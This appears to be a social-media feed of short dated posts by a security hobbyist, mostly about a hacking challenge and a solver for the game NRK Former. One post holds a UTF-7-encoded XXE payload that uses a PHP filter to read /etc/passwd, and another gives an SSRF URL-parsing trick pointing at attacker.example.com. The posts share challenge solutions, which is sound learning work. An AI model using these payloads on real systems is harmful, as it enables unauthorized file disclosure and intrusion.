<?xml version="1.0" encoding="UTF-7"?>+ADwAIQ-DOCTYPE data +AFsAPAAh-ENTITY xxe+ACA-SYSTEM +ACI-php://filter/convert.base64-encode/resource+AD0-/etc/passwd+ACIAPgBdAD4-+ADw-data+AD4APA-title+AD4-+ACY-xxe+ADsAPA-/title+AD4APA-/data+AD4
22.03.2025 20:12
Sorry if I'm interpreting wrong or ruining the competition. I really enjoyed the article and learned something new! My PoC uses UTF-7 and PHP filters to read arbitrary files. The PHP filters could probably be used to get RCE, but that is too long for a Bluesky post!
22.03.2025 20:12
I interpret the words "post your solution" and "reply" as it's OK to share a solution publicly before the competition is finished. Just feels a bit strange
22.03.2025 19:57
With "reply", do you mean comment our solution here?
22.03.2025 19:48
Better to just use the browser. No updates;)
11.03.2025 18:59
… Depending on how the function is used, you would need to add one more colon to my original URL to get an SSRF.
05.03.2025 14:16
This is just URL parsing. The vuln comes from how you use the function, I guess. SSRF could definitely become an issue here since the hostname assumption is wrong.
05.03.2025 14:12
regex <3 `https://example.com:pass@attacker.example.com`
04.03.2025 22:28
GitHub - martcl/nrk-former: Solves NRK Former with A*
Solves NRK Former with A*. Contribute to martcl/nrk-former development by creating an account on GitHub.
NRK Former is a cool game! I have spent the last few days making a program to find the theoretically best score it is possible to get. So if anyone ever sits wondering how Norway's best got such a good score;
github.com/martcl/nrk-f...
30.11.2024 10:51